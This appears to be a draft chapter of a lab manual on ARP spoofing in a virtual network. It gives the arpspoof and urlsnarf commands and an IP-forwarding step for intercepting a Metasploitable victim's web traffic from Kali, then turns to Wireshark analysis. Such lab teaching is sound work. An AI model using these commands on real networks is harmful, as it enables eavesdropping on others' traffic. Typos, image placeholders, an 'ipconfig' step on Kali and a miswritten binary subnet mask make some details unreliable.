Chapter 10 Arp Spoofing

10.1 Background

In this lab we will discuss arp spoofing. Arp spoofing is attack it which an attacker tricks a victim into believing that they are another machine, by pretenting that their MAC address maps to ipaddress that is not their own.

Shows the Shows the topology of the virtual lab you configured

FIGURE 10.1: Shows the Shows the topology of the virtual lab you configured

Virtual box emulates a virtual network with a virtual gateway. To determine the IP address of the default gateway you need to determine the ipaddress of kali linux virtual machine and it’s subnet gateway.

10.2 Determining router gateway.

Step 1 Determine the ipaddress and subnet mask by typing the ipconfig command.

[Include picture with subnetmask and ipaddress highlighted]

Step 2 Calculate the default gateway, by anding the subnet mask with you ip address and adding 1. The resulting number if your default gateway.:

Kali Ip 10 0 2 4
Kali Ip Binary 0000 1010 0000 0000 0000 0010 0000 0100
Subnet Mask 255 255 255 0
Mask in Binary 1111 1111 1111 1111 1111 1111 0
Mask & Ip + 1 10 0 2 1

Great now that we have determined the ipaddress of the our virtual gateway. We can trick the metasploitable machine on our virtual network into thinking that we are the default gateway so that all network traffic gets forward by switch to our machine. We do this my sending packet that falsely tell the metasploitable machine that mac address of Kali Mahchine is associated the IP-address of the default gateway. This means that all traffic that was intended for the default gateway will now get routed to the Kali Linux box.

[Include ARP spoofing picture below]

Step 3 Type: ip route|grep default , get the router ip

Step 4 On your attacker type: echo ‘1’ > /proc/sys/net/ipv4/ip_forward

Step 5 On the attacker type: arpspoof -i eth0 -t VICTIMIP ROUTERIP

Step 6 On the attacker, in another terminal type: urlsnarf -i eth0

Step 7 On the victim open firefox and navigate. If you’ve done everything right, now you will see the traffic on the attacker.

Step 8 On the attacker: press ctrl+c on the arp terminal window to fix the arp table and shut down the attack

10.3 Analyzing the Network Traffic Associated with the ARP request.

Close both VMs and open the packet capture in wireshark. Look for the ARP messages between the attacker, victim, and router.